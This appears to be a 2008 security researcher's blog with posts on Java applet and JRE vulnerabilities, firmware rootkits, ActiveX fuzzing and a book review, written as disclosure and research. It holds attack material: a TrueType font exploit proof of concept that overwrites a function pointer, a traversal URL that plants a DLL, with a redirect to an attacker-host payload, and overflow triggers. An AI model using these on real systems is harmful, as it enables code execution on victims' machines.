then an internal canonicalisation routine is triggered, converting '/' characters into '.' so we end up with a URL looking like "http:..baz.com.foo" and the attack fails. The easiest way round this limitation is to use the decimal representation of an IP address, as is apparently common with spammers. If you're too lazy to do the maths, there's an online converter here. So our code parameter will look like:


<APPLET code="http://2130706433/foo" codebase="http://bar" />
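If you'd rather do the sum yourself than trust an online converter, it's a one-liner; 127.0.0.1 works out to the 2130706433 used above:

public class DecimalIp
{
    public static void main(String[] args)
    {
        int[] o = { 127, 0, 0, 1 };
        // (first octet * 256^3) + (second * 256^2) + (third * 256) + fourth
        long dec = (o[0] * 16777216L) + (o[1] * 65536L) + (o[2] * 256L) + o[3];
        System.out.println(dec); // prints 2130706433
    }
}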


The final complication is that the Java plugin loads foo.class expecting to find a class called "http://2130706433/foo". This is easy to solve - we compile our class with a class name of "aaaaaaaaaaaaaaaaaaaaa" and use a hex editor to replace this string with "http://2130706433/foo" (the compiler doesn't like it but the JVM will load it).


That concludes the first post on this issue. Next time I'll cover using the same origin bypass to escape the sandbox.




Cheers

John




* A while back I posted an advisory on another same origin bypass that allowed an applet loaded from a remote location to connect to localhost, thereby allowing it to attack local services.

Thursday 28 February 2008

Repurposing Attacks Against Java Applets

If you read my review of the Web Application Hacker's Handbook you may remember I made the following point:


The authors talk about repurposing ActiveX controls but do not mention that this also applies to signed Java applets, which can also expose dangerous methods in exactly the same way.


In this post I'm going to discuss a security flaw in a Java applet signed by Sun Microsystems. The vulnerability lets us drop an arbitrary file to an arbitrary location on the file system on Windows platforms, subject to the user's permissions and, if in IE7, depending on whether Protected Mode is on or not. The applet in question has been updated to fix this issue and the NGS advisory is here.


Before I talk about the applet itself, let's take a brief look at the components of a signed JAR:


  • A signed Java applet consists of a JAR file (a zip archive) containing the application class files, a manifest, one or more signature files and a signature block.

  • The manifest holds a list of files in the JAR that have been signed and a corresponding digest for each file, typically SHA1.

  • A signature file consists of a main section which includes information supplied by the signer but not specific to any particular jar file entry, followed by a list of individual entries whose name must also be present in the manifest file. Each individual entry must contain at least the digest of the corresponding entry in the manifest file.

  • The signature block contains the binary signature of the signature file and all public certificates needed for verification.

For anyone interested in the verification process, this paragraph from the Java Plug-in Developer's Guide gives a good description. In practice, the user is presented a dialog like this:



Contrast this to the dialog box that IE7 presents when installing a new ActiveX control (and note that I clicked for "more options" to show the always install/never install options):



The difference from a security perspective is obvious*: Sun want you to always trust the publisher, Microsoft want to ask you every time. For anyone wondering if you only see this behaviour with Sun-signed applets, this is the default behaviour for all signed applets (don't believe me? Go check out the Hushmail applet). It is worth noting, however, that the checkbox is only ticked if the certificate chain verifies all the way up to a trusted Root CA certificate. If the certificate has expired or is self-signed, the checkbox will not be ticked.


This is a pretty interesting design decision. If you click "Run" in the Java dialog box above, you're allowing all existing and future applets signed by the same publisher (strictly, the same certificate) to automatically run regardless of the website they are loaded from and the parameters they are instantiated with. So even if you have some level of confidence in the applet that you are about to run, if the publisher produced a buggy applet and signed it with the same certificate, a malicious website can repurpose it and silently use it against you. Scary, huh? This is one of those usability vs. security trade-offs**. Even if the applet is cached on your machine, if the certificate is not in the trusted store, you will be prompted every time it's instantiated. If you're the IT manager of a large corporation and your Intranet homepage has a signed applet, you probably don't want your users to see a security warning every time they open a browser.


Now for the actual vulnerability... The JNLPAppletLauncher is a "general purpose JNLP-based applet launcher class for deploying applets that use extension libraries containing native code." What this means is that an unsigned applet that requires a signed native code extension such as Java 3D can be launched via the JNLPAppletLauncher by passing it a JNLP file that references both the original applet and the extension. There are some demos here; FourByFour is a great example of Java 3D in the browser (though tic-tac-toe on a 4x4x4 cube... it's not exactly Guitar Hero III).


The JNLPAppletLauncher had a simple directory traversal flaw exploitable on Windows platforms. The applet reads extensions from the JNLP file, whose location is passed as a parameter during the applet instantiation. The extension path is examined for the parent path sequence "../". On Windows of course, this is insufficient - the failure to check for "..\" ultimately allows us to drop an arbitrary file on the file system. The extension path is concatenated to the base URL so we end up with something like:


http://attackerdomain/..\..\..\..\..\..\windows\system32\file.dll


If you're thinking this is an invalid URL, you're right. You'll need a hacked up web server to honour it, or at least the ability to modify the httpd.conf on an Apache server. A request for a file below the web root will cause Apache to generate an HTTP 400 (Bad Request). We can translate this into an HTTP 302 (Redirect) via the ErrorDocument directive. The applet will follow the redirection and download the content to the path "..\..\..\..\..\..\windows\system32\file.dll".
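In Apache terms this is a single directive; the hostname and payload path are of course illustrative:

ErrorDocument 400 http://attackerdomain/payload/file.dll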


Sun have now fixed this issue, so the applet you can retrieve from https://applet-launcher.dev.java.net is no longer vulnerable. Since the JAR is not an officially supported product, there will be no Sun Alert released. And given the prerequisites for this attack (you have to coerce a user into visiting a malicious web site, then have the user agree to run the control [unless of course they have trusted Sun as a publisher], then you need a hacked-up web server), I do not consider this issue to be especially serious. That said, it's worth checking your Java trusted certificate store to see exactly which publishers you currently trust. You can get to this via the Java Control Panel (C:\Windows\system32\javacpl.cpl):



Anyway I'll be revisiting signed applets in a future post. In the meantime, my advice is beware of always trusting the publisher.




Cheers

John


* Though the dialog boxes look pretty similar and present the same information, the bottom panel is used to communicate different messages: Microsoft warn you that the file could harm your computer; Sun tell you that the certificate chains to a trusted root CA certificate (which is redundant, as they've already told us "the application's digital signature has been verified" in the top panel).


** If you want to check out some of the Java community's feedback to this dialog box, check out the comments on Stanley Ho's blog post from 2005, Deployment: Goodbye scary security dialog box!

Wednesday 20 February 2008

Thoughts on Firmware Rootkits

Over the last couple of years I've presented a number of low level attacks aimed at demonstrating off-disk rootkit persistence in firmware.


Vulnerability research into hardware typically has a high barrier to entry; development boards and hardware debuggers are expensive, and specs are often unfathomable or hundreds of pages long (or both). That said, tools like Bochs (an open source IA-32 emulator with an integrated debugger allowing you to debug the VM from the very first instruction) and the MindShare books are great resources.


So why go to the effort of hacking hardware? Well, I believe it's a fruitful research area; after all, the OS is only as secure as the hardware it's running on, and as more and more machines ship with TPMs (and software to make use of them), the need for independent researchers to cast a critical eye over these technologies is greater than ever, especially in light of analyses such as Christiane Rütten's investigation into an encrypted hard drive enclosure (a kind of technical version of the Emperor's New Clothes).


Previously I've focused on the Advanced Configuration and Power Interface (ACPI), PCI Option ROMs and the Extensible Firmware Interface (EFI*). The concepts behind most of the attacks I've covered are not new (is there ever anything in security that is truly new?). At the time I carried out the research, however, I found no practical information on firmware attacks, hence I set out to determine how feasible they really were, what they might look like from a defensive perspective and how different hardware and firmware implementations affected things.


So anyway, it's been a while since I've released any material in this area, but let me assure you there is some on the way. I recently spoke to Deb Radcliff for an article in this month's SC Magazine. The crux of the article is that a modern PC is a complex system containing many peripheral devices, each with its own CPU, its own firmware and its own interface to this firmware. If we assume that a given secure boot process will measure all firmware containing instructions for the main CPU, the question is how does it locate and measure the firmware specific to each device? On a system with a TPM and a secure boot process, there is still potential to reflash a device's firmware in order to run a rootkit on the device itself... why run on the main CPU, risking detection, if you can interact with main memory and the I/O space from a peripheral?


You'd be surprised exactly what you can attack from the OS without physical access to the machine. In the article I use smart batteries as an example. There's a good chance that your notebook's battery firmware (data and potentially code) can be updated from the OS. For the incredulous among you, check out the following passage from Atmel’s ATmega406 AVR Microcontroller whitepaper:


The ATmega406 facilitates safe in-field update through self-programming. The ATmega406 CPU can access and write its own program memory. Atmel’s self-programming has true read-while-write capabilities, so critical parts of the battery application can be allowed to remain running while the update is in progress. Since the programming is CPU-initiated, the device is able to receive updates through any supported interface. This means that the SMBUS interface between the PC and battery in effect can be used for in-field updating of the battery. This is by far the most flexible option, as the update can be implemented as a program running on the host PC.


For a more rigorous treatment of trusted computing with untrustworthy devices, I highly recommend Hendricks and van Doorn's paper from 2004, Shoring up the Trusted Computing Base.






Cheers

John




* I'll blog on EFI in a future post. If you've never heard of it or don't know much about it you're probably a Windows XP or Vista user, who as Apple puts it, is "stuck in the 1980s with old-fashioned BIOS" :)

Wednesday 13 February 2008

Review of The Web Application Hacker's Handbook



You might be forgiven for thinking that I would give a harsh review to a book whose co-author once had an unfortunate vomiting incident in my near vicinity. My very near vicinity*. That said, I know first hand that both Dafydd Stuttard and Marcus Pinto, colleagues of mine at NGS, worked extremely hard on this book, so I'll try and give an honest review...

WAHH is a book primarily for pen testers, though developers of web applications would do well to read it too. The first thing that struck me is that it has a logical flow to it; chapters on the evolution of web applications, core defensive mechanisms and web application technologies are followed by mapping the application and attacking key components, prior to the introduction of more advanced topics such as automation. WAHH is a hefty 700 pages split into 20 chapters. I made some notes as I went through it, which I've written up below.


What I liked about WAHH:

  • Chapter 11 - Attacking Application Logic; this chapter presents 11 real-world examples. It's hard to describe a generic approach to detecting logic flaws in an application, as the authors point out, but they've managed to do a good job of imparting the mindset required to find logic bugs, breaking each example into three sections: the functionality, the attack and the (misplaced) assumptions. This chapter could have easily ended up coming across as two pen testers wheeling out old war stories but instead it's an interesting read. Example 8, "Escaping from Escaping" (the developers forgot to escape the escape character) is a classic.

  • Chapter 13 - Automating Bespoke Attacks shows how to automate an attack against a specific application by creating your own Java-based tool. It's great to see the authors present this kind of information from first principles rather than simply referring the reader to a pre-made tool as so many security books seem to do. Of course, the hugely powerful Burp Intruder, written by Dafydd, makes an appearance later in the chapter, but the underlying message is that automation can save you heaps of time, and if there isn't a tool out there that does what you need, write one!

  • Chapter 15 - Attacking Compiled Applications provides a solid overview of typical implementation flaws such as buffer overflows, integer overflows and format strings. It's good to see mention of FormatMessage vulnerabilities. Whilst many web app tests won't involve any direct testing of components written in native code (with the exception of the web server etc.), all pen testers should at least be comfortable code reviewing simple CGIs written in C. I also found chapter 18 - Finding Vulnerabilities in Source Code a handy cheat sheet for obvious things to look for in the common web languages.

  • Chapter 20 - A Web Application Hacker's Methodology. A methodology is an important part of pen testing to ensure consistent results through a base level of testing. It's a difficult thing to write, as it has to be generic enough to apply to a sizeable number of application scenarios, but if it's too generic it's just not useful (not to mention that most pen testers run a mile when asked to work on documentation!). Conveniently, Daf and Marcus provide a comprehensive, real-world, ready-to-use methodology at the end of WAHH.


What I Didn't Like

  • There is no mention of Silverlight. Chapter 5 covers "thick client technologies" - Java, ActiveX and Flash, but not Silverlight. I do not envisage many financial institutions creating applications in Silverlight (in the same way that they don't use Flash either); however, I believe we shall see a slow but steady increase in its mainstream popularity, so it would have been nice to see some coverage of Silverlight-specific tools, such as Silverlight Spy. As an aside, I am also not convinced by the use of the term "thick client" in the context the authors use it, though it's obvious what is meant.

  • The MSSQL information in the SQL injection section seemed more SQL Server 2000-centric than 2005 e.g. there was no mention of xp_cmdshell being off by default in SQL Server 2005 (it is enabled by executing the sp_configure stored procedure).

  • There was little mention of WebDAV. I would have liked to see a little more coverage of it - exploiting misconfigurations, information disclosure and so on - since a great many content management systems use it and it is popular with online office suites like Zimbra and ThinkFree.

  • The discussion of decompiling Java applets was vague ("For various reasons, Jad sometimes does not do a perfect job of decompiling bytecode"). And though JSwat is mentioned in passing I would have liked to have seen an example of hotswapping a class in an applet to bypass a client-side check.

  • The ActiveX section could do with some further detail. There's no mention of IObjectSafety or property bags, and the only fuzzer mentioned is COMRaider (you might also try AxMan or AxFuzz). SiteLocking is mentioned but not by name. In addition, the authors talk about repurposing ActiveX controls but do not mention that this also applies to signed Java applets, which can expose dangerous methods in exactly the same way.


Conclusion

All in all, I highly recommend this book to pen testers, web application developers and anyone interested in the evolution of web security. It's great to see all this information in one place, and my minor grumbles above certainly do not detract from an informative, enjoyable read. I thought it read very well, breaking up technical discussion with humour ("whatever your opinion of the threat posed by XSS vulnerabilities, it seems unlikely that Al Gore will be producing a movie about them any time soon.") It has clearly gone through diligent editing, which seems to be lacking in many tech books these days (reminding me of a lecturer I had at university who had written the course text; he paid out a small reward every time someone found a mistake or typo in it - I challenge Daf and Marcus to do the same!)




Cheers

John


* Ask PortSwigger.

Wednesday 30 January 2008

Three Categories of Buffer Overflow in the JRE

Some people think that writing code in Java is a silver bullet against implementation flaws such as buffer overflows. The truth is a little murky. Certainly, there is no provision for overflows in pure Java code; reading or writing past the end of an array generates an exception, as the following toy code demonstrates:



public class overflow
{
    public static void main(String args[])
    {
        char buf[] = new char[10];
        String src = args[0];

        for (int i = 0; i < src.length(); i++)
        {
            buf[i] = src.charAt(i);
        }

        System.out.println("buf is " + new String(buf));
    }
}


C:\dev>java overflow foobar1234
buf is foobar1234


C:\dev>java overflow foobar12345
Exception in thread "main" java.lang.ArrayIndexOutOfBoundsException: 10
at overflow.main(overflow.java:10)


But real code, though it might be written in 100% Java, depends heavily on the Java Runtime Environment (JRE), and the JRE contains methods that are written in straight C. We all know what happens when C hangs out with its buddies: fixed-size buffers, strcpy and user input.


So how do you even start to assess the attack surface of the JRE? Perhaps I'll go into this in more detail in a future post if anyone is interested, but briefly for now, if we discard logical flaws in the JRE that let you escape the sandbox (as attempting to measure exposure to these is really hard) and concentrate solely on the native code parts, we can:

  • Determine the amount of native code within the JRE:

    • Download the Java source code and search for the JNIEXPORT and JNICALL macros to detect native methods, e.g.:


      src/share/native/sun/awt/image/gif/gifdecoder.c:

      JNIEXPORT jboolean JNICALL
      Java_sun_awt_image_GifImageDecoder_parseImage(JNIEnv *env,
      jobject this,
      jint relx, jint rely,
      jint width, jint height,
      jint interlace,
      jint initCodeSize,
      jbyteArray blockh,
      jbyteArray raslineh,
      jobject cmh)
      {
      ...


    • Or alternatively dump the exports of the DLLs within the JRE bin directory, e.g.:


      C:\dev> dumpbin /exports jpeg.dll | findstr /c:"_Java_"

      _Java_com_sun_imageio_plugins_jpeg_JPEGImageReader_abortRead@16
      _Java_com_sun_imageio_plugins_jpeg_JPEGImageReader_disposeReader@16
      _Java_com_sun_imageio_plugins_jpeg_JPEGImageReader_initJPEGImageReader@8
      _Java_com_sun_imageio_plugins_jpeg_JPEGImageReader_initReaderIDs@20
      _Java_com_sun_imageio_plugins_jpeg_JPEGImageReader_readImage@80


    • Or enumerate all methods of all classes in the runtime and count up those marked as native. This can be done in a few lines of code using the Byte Code Engineering Library (BCEL), a great project for low-level manipulation and construction of classes (a minimal sketch follows after this list).


  • With a list of the native methods, perform some static analysis to score each method - how much code does it contain (including all the code within all function calls), does it process data that might be untrusted and so on.


  • Now trace or perform static analysis on your application - your applet, servlet etc. - to determine which methods you touch.
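
A minimal sketch of the BCEL approach follows - nothing more than a starting point, and it assumes you have the BCEL JAR on your classpath and point it at rt.jar (or another JAR from the JRE):

import java.util.Enumeration;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;

import org.apache.bcel.classfile.ClassParser;
import org.apache.bcel.classfile.JavaClass;
import org.apache.bcel.classfile.Method;

public class CountNatives
{
    public static void main(String[] args) throws Exception
    {
        // args[0] is the path to rt.jar (or charsets.jar, jsse.jar etc.)
        ZipFile jar = new ZipFile(args[0]);
        int count = 0;

        for (Enumeration entries = jar.entries(); entries.hasMoreElements();)
        {
            ZipEntry entry = (ZipEntry) entries.nextElement();
            if (!entry.getName().endsWith(".class"))
                continue;

            // Parse each class file and inspect the access flags of its methods
            JavaClass clazz = new ClassParser(jar.getInputStream(entry), entry.getName()).parse();
            Method[] methods = clazz.getMethods();

            for (int i = 0; i < methods.length; i++)
            {
                if (methods[i].isNative())
                {
                    System.out.println(clazz.getClassName() + "." + methods[i].getName());
                    count++;
                }
            }
        }

        System.out.println("Total native methods: " + count);
    }
}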


But I digress. The main point of this post is to highlight three categories of buffer overflow that exist within the JRE, so here they are:


  1. Buffer overflows in file format parsers


    Much of the JRE file format parsing code is implemented in native code, typically either for speed or because the code originated elsewhere. This includes BMP, GIF, JPEG, ICC, TTF and Soundbank parsing, and a few I've probably forgotten. (A sketch of how little Java it takes to reach these parsers follows after this list.)


    Incidentally, I was first alerted to this when a Java application I was running (it happened to be Burp Proxy, seriously!) started crashing, leaving the familiar hs_err.log file behind. The log showed that I was triggering an access violation in fontmanager.dll, which I tracked down to a corrupted TrueType font in my fonts folder (TrueType fonts are hard things to parse - there's a mixture of 16- and 32-bit fields, lengths and offsets, and to cap it all, provision for a virtual machine, as you'll already know if you read my last post!).


    Chris Evans did some great write ups on the bugs he found in the JRE image parsers here and here.


  2. Buffer overflows in the platform API wrapper code


    In addition to file format parsers, methods that interact with the OS are also ultimately implemented in native code, as they need to call the appropriate platform API. These methods typically need to convert Java datatypes such as a String into a C datatype, such as a wide character array. Sound like a potentially hazardous operation? Well, my colleagues at NGS, Wade Alcorn ("The King of BeEf") and Marcus Pinto (of Web Application Hacker's Handbook fame) found such a bug in BEA's JRockit JVM. The NGS advisory is here. The issue could be triggered remotely by an unauthenticated user against WebLogic Server simply by requesting a long URL (!), which caused an overflow as the path was canonicalised.


  3. Buffer overflows in the underlying platform APIs


    The previous category comes about from insecurely preprocessing data before handing it off to a platform API. Let's consider the opposite - doing no processing and exposing a bug in the platform API itself. A notable example of this category is a critical vulnerability discovered by Peter Winter-Smith, another colleague of mine at NGS. He found an overflow that could be triggered by passing a string of 65536 bytes to gethostbyname, exported by ws2_32.dll. This issue was fixed in MS06-041 (NGS advisory here). It was trivial to generate Java code to hit this bug (see the sketch just after this list).


    Now you may be thinking that it isn't really fair to call this a Java problem, as it is clearly an OS/third party library bug. Perhaps it isn't fair :) It is interesting, though, that in some areas of the JRE the layer on top of the platform APIs is so thin that these types of bug are exposed (I think Peter actually found the gethostbyname bug while testing a Java application!) Also note that this further complicates attack surface analysis :(
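
As to how trivial the Java side is: something along the lines of the sketch below gives the general shape of a trigger - an oversized hostname handed more or less straight to the platform resolver. To be clear, this is not Peter's actual PoC, and whether the string reaches the vulnerable API intact depends on the JRE and OS in question.

import java.net.InetAddress;

public class LongLookup
{
    public static void main(String[] args) throws Exception
    {
        // Build an oversized hostname (the ws2_32.dll issue described
        // above involved a string of around 64KB)
        StringBuffer sb = new StringBuffer();
        for (int i = 0; i < 65536; i++)
        {
            sb.append('A');
        }

        // getByName() hands the string to the platform resolver via
        // native code with relatively little preprocessing on the way
        InetAddress.getByName(sb.toString());
    }
}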

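And going back to category (1) for a moment, here is how little Java it takes to drive untrusted data into the native image decoders (the same JPEG reader whose exports appear in the dumpbin output earlier). A throwaway sketch rather than anything resembling a fuzzer:

import java.io.File;
import javax.imageio.ImageIO;

public class DecodeUntrusted
{
    public static void main(String[] args) throws Exception
    {
        // ImageIO picks a reader based on the stream contents; for JPEG
        // (among other formats) the actual decoding happens in native
        // code inside the JRE
        System.out.println(ImageIO.read(new File(args[0])));
    }
}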

A final note on how these affect different types of Java application. The example I gave in (2) is a clear example of a buffer overflow in the Java runtime that can be used to compromise a server; the examples in (1) and (3) less so. It's feasible that a Java Enterprise application may parse a file uploaded by a user, but it obviously depends on the purpose of the servlet. On the other hand, a malicious applet that attempts to exploit the browser through a file format bug in the JRE is certainly conceivable.


And as for mobile Java: mobile runtimes do not typically share native code components with the desktop JRE, so the chances of there being an all-conquering cross-device, cross-architecture, cross-Java-implementation vulnerability are pretty slim (despite news to the contrary), though I'll stop short of saying impossible :)




Cheers

John

Thursday 24 January 2008

A Cross-browser, Cross-platform, Cross-architecture Bug in the JRE

pwned.



In October 2007 I released an advisory on a vulnerability in Sun's Java Runtime Environment, versions 1.5.0_09 and below (NGS link here, SunSolve here). The bug allowed an attacker to craft a malicious TrueType font that executes arbitrary native code when processed by the JRE on behalf of an applet, thus compromising the browser. I gave partial details in the original advisory but have decided to discuss it in a bit more detail here.



What makes TrueType fonts more interesting than a run-of-the-mill file format is that they contain code. Surprising as it may seem, TrueType fonts can contain instructions for a virtual machine. Wikipedia has a good summary:


TrueType systems include a virtual machine that executes programs inside the font, processing the "hints" of the glyphs. These distort the control points which define the outline, with the intention that the rasterizer produces fewer undesirable features on the glyph. Each glyph's hinting program takes account of the size (in pixels) that the glyph is being displayed at, as well as other less important factors of the display environment.


Although incapable of receiving input and producing output as normally understood in programming, the TrueType hinting language does offer the other prerequisites of programming languages: conditional branching (IF statements), looping an arbitrary number of times (FOR- and WHILE-type statements), variables (although these are simply numbered slots in an area of memory reserved by the font), and encapsulation of code into functions. Special instructions called "delta hints" are the lowest level control, moving a control point at just one pixel size.


So to the flaw in the JRE. Firstly I should state that the TTF parsing code and the virtual machine were written in C (not Java) and exposed via JNI. This means we are into the realms of common implementation flaws - buffer overflows, integer overflows and the like.


The VM implements two instructions for writing values to the Control Value Table (CVT). The CVT holds global variables that can be used by multiple glyphs - it's basically a global data store. One of the instructions for writing to the CVT did not verify that the supplied index lay within the bounds of the CVT. This allows us to write a scaled value at an arbitrary offset relative to the base of the CVT. Through experimentation (though this is probably documented somewhere) I determined that the scaling factor is based on the requested size of the font - setting this to 32 results in a factor of 1.


Since the CVT is dynamically allocated, we don't quite have an arbitrary write to an arbitrary location yet; we must first determine where the CVT is located. Fortunately the instruction to read from the CVT also doesn't validate its index, so we can read memory relative to the CVT. Again from experimentation, I determined that 0x38 DWORDs prior to the CVT (i.e. at a negative offset) there is a pointer to the end of the CVT. Given that we know the size of the CVT, we can determine its base and therefore write an arbitrary value to an arbitrary location.


The nice thing about this bug is that we can call the write primitive above repeatedly, which means there are countless ways to exploit it. I chose to overwrite a function pointer for one of the virtual instructions, then call that instruction. The value I overwrite the function pointer with (i.e. the address of my payload) is the address of the CVT itself. What about DEP? Java and DEP don't get along, so the chances are that if the user has used the Java plugin before, DEP will be disabled. This means we can execute our payload straight from the heap.


Here's what you'll need to write a PoC:


  1. First, the easy bit: a Java applet to load the font. For convenience we can package the font with the applet inside a JAR file. The alternative is that we load the font from a web server (subject to the same origin policy, of course) or that we put it inside our class file as an array of bytes, accessed via a ByteArrayInputStream. To trigger parsing of the font and execution of our TTF instructions, we simply call createFont, set it to the appropriate size and render some text:

    InputStream is = this.getClass().getResourceAsStream("exploit_font.ttf");
    Font font = Font.createFont(Font.TRUETYPE_FONT, is);
    font = font.deriveFont(32.0f);
    Graphics g = this.getGraphics();
    g.setFont(font);
    g.drawString("This will trigger the bug", 20, 20);


  2. Next on to the font itself. Documentation on the TrueType instruction set may be found here. To construct the font I used the TTIComp TrueType instruction compiler. TTIComp takes as input a TTI file (containing our functions) and a TTF file. It produces a new TTF containing our compiled functions. TTIComp comes with some examples and a great tutorial for getting started.


  3. And finally the TTI itself. It looks something like this:

    #input "original_font.ttf"
    #output "exploit_font.ttf"

    #cvt cvt0: 0

    // This is our definition of the preparation
    // function
    // This will get called repeatedly when rendering
    // text in this font

    void prep()
    {
    // Function 0x89 is getInformation
    int iFn = 0x89;

    // Address of function pointer table for
    // JRE 1.5.0_07
    int iFnPtrTable = 0x6D27BB00;

    // End of CVT
    int iEndCVT = int(getCVT(uint(-0x38)));

    // Location we need to overwrite
    int iLocation = iFnPtrTable + int((fixed(iFn) * 4.0));

    // Fill CVT with our payload (some int 3's)
    setCVT(uint(0), 0xCCCCCCCC);

    // Perform overwrite
    // We subtract 4 from iEndCVT to get the address of
    // the start of the CVT (i.e. the address of our
    // payload)
    setCVT(uint(fixed(fixed((iLocation - iEndCVT)) / 4.0)), iEndCVT - 0x4);

    // Trigger payload by calling getInformation
    getInformation(uint(0));
    }


You'll note that I use a hardcoded address for the table of instruction pointers. I'm lazy, sue me. I suspect the base address of fontmanager.dll, the DLL containing the font parsing code, doesn't move across versions of the JRE so you could scan for the table fairly easily.


And our payload of int 3s isn't very interesting. Ideally our stager payload should allocate some memory, copy our second-stage payload into it and kick off a new thread at that address. This ensures that the Java plugin/font manager code can keep running as normal (we don't want to be executing code from the CVT when the font's resources are freed).


Finally, what makes bugs in the Java plugin so dangerous is that most of them can be exploited cross-browser, cross-platform and cross-architecture. To write an exploit capable of this, create TTFs as above but with payloads specific to a particular scenario (OS and architecture) and add some logic to determine which font to render. An unsigned applet can read properties such as os.name and os.arch to assist in this.
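
For illustration, the selection logic might look something like the fragment below. This is a hypothetical helper living inside the applet class (the resource names are made up, and java.io.InputStream is assumed to be imported); the key point is that os.name and os.arch are among the handful of system properties an unsigned applet is permitted to read.

// Hypothetical: pick the TTF whose payload matches the victim platform
private InputStream openFontForPlatform()
{
    String os = System.getProperty("os.name").toLowerCase();
    String arch = System.getProperty("os.arch");

    String resource;
    if (os.indexOf("windows") != -1)
    {
        resource = "exploit_font_win_" + arch + ".ttf";
    }
    else if (os.indexOf("linux") != -1)
    {
        resource = "exploit_font_linux_" + arch + ".ttf";
    }
    else
    {
        // Fall back to a font that renders normally and carries no payload
        resource = "exploit_font_other.ttf";
    }

    return this.getClass().getResourceAsStream(resource);
}

The JAR then simply contains one compiled TTF per platform/architecture combination you care about.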


That wraps up discussion of this bug. I'll be posting more on specific Java plugin issues in the coming months, and I have a post in the pipeline that debunks the most common Java security misconceptions, so keep an eye out for that.




Cheers

John

Thursday 17 January 2008

Fuzzing ActiveX? Don't Forget The Property Bags


(Note: I have a backlog of posts so I'll be posting a fair amount over the next month.)


There are several tools out there to fuzz ActiveX controls. COMRaider is one such tool and a useful addition to any bug hunter's toolkit. I am going to discuss a limitation of COMRaider that you should be aware of if you are testing ActiveX controls: it doesn't fuzz property bags.


I was going to start by reproducing the definition of the OBJECT tag from the HTML DTD, but it's pretty big, so here's an example instead:


<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" width="300" height="120">
<param name="movie" value="flash.swf">
<param name="quality" value="high">
<param name="bgcolor" value="#FFFFFF">
</object>


In order to investigate the methods and gettable/settable properties of a particular ActiveX control such as the Shockwave plugin, we can fire up the Microsoft OLE/COM Object Viewer (oleview), or programmatically create the object and ask it what it supports through the IDispatch interface.


But methods and properties are not the only way we can interact with ActiveX controls. What about the name/value pairs supplied via the PARAM tags above (movie, quality and bgcolor)? What other parameters might our target control accept, and how do we determine them? Well, we have three options:


  1. Search for web pages that instantiate the control and note the parameters they pass (or consult the control's documentation in the case of a control like Shockwave). This approach is fine for obtaining the normal-use parameters, but what if the control has interesting debug parameters that are undocumented?

  2. Run "strings" over the binary and treat each character string as the name of a parameter. This approach is viable but, depending on the number of strings returned, may result in an unrealistic number of test cases.

  3. Implement the required ActiveX container interfaces and let the control tell us what parameters it will accept. Clearly an optimal approach, this is what we shall focus on.

The parameter mechanism is implemented by the IPropertyBag interface in the container (i.e. Internet Explorer, your fuzzer, TstCon) and the IPersistPropertyBag interface in the control itself. There are also enhanced versions of these interfaces, IPropertyBag2 and IPersistPropertyBag2, though most controls I've seen don't use them (in fact the QuickTime plugin is one of the few controls I've seen with an IPersistPropertyBag2).


So in order to enumerate a control's parameters, all we have to do is implement IPropertyBag. This is actually pretty simple, since the interface only exposes two methods:


Read - Tells the property bag to read the named property into a caller-initialized VARIANT.
Write - Tells the property bag to save the named property in a caller-initialized VARIANT.


Time for an example. A while back, when first looking into property bags, I discovered a bug in the version of Yahoo! Messenger I happened to have installed. As it turned out, I had an outdated version; newer versions had fixed the issue, which had been reported to Yahoo! by iDefense.


There was a heap overflow in ymmapi.dll within the safe-for-scripting ymmapi.ymailattach.1 component. The vulnerable version of the control is still hosted on Yahoo.com here in a signed CAB file, even though I warned them of this in November '06. The idea of flawed but signed code floating around the Internet is a scary one, though the logistics of dealing with this are more of a Microsoft ActiveX design problem which I will discuss another time.


Back to the example in hand. Let's see how we can programmatically enumerate the supported parameters, pass a long string to each of them, locate the overflow and generate some equivalent HTML. I'm not going to give you the actual code (where's the fun in that?) but here's the set of steps required:


1. Initialise COM via CoInitialize.


2. Convert the supplied ProgID into a CLSID via CLSIDFromProgID if you don't already have it.


3. Create an instance of the ActiveX control via CoCreateInstance.


4. Call QueryInterface to request the IPersistPropertyBag interface.


5. Call the Load method of this interface passing it a pointer to our IPropertyBag implementation. Implementing a rudimentary IPropertyBag is simple - if you're happy to break the rules of COM for a simple PoC just implement stubs for QueryInterface, AddRef, Release and Write (obviously not recommended if you want to write anything more than a PoC). The only method that actually needs to do anything is Read.


6. The Read method of our IPropertyBag will be called each time the control requests the value of a specific parameter. We must reply with a VARIANT of type BSTR: supply an empty string if you just want to enumerate the parameters, or return your fuzz string. Once we trigger heap corruption our process will AV, so it's best to run it under a debugger (and enable page heap with gflags).


If you go through the above steps and run your code on the ymmapi.ymailattach.1 control (having registered the control with regsvr32 first if you downloaded the CAB), you should find it breaks soon after receiving a long string in response to the Read for the "TextETACalculating" property.


Generating an HTML test case to reproduce this is easy - use JavaScript to dynamically create an OBJECT tag and the following function to build a string of suitable length (which I borrow from here):


String.prototype.repeat = function(l)
{
return new Array(l+1).join(this);
}

var fuzzstring = "a".repeat(50000);


Giving you something like this when you load it into IE and your debugger kicks in:


The obligatory OllyDbg shot


So that's it for now. I'll be posting more on ActiveX in future posts. I want to cover killbits, ActiveX design limitations, and how to detect and handle sitelocking when fuzzing.


Cheers

John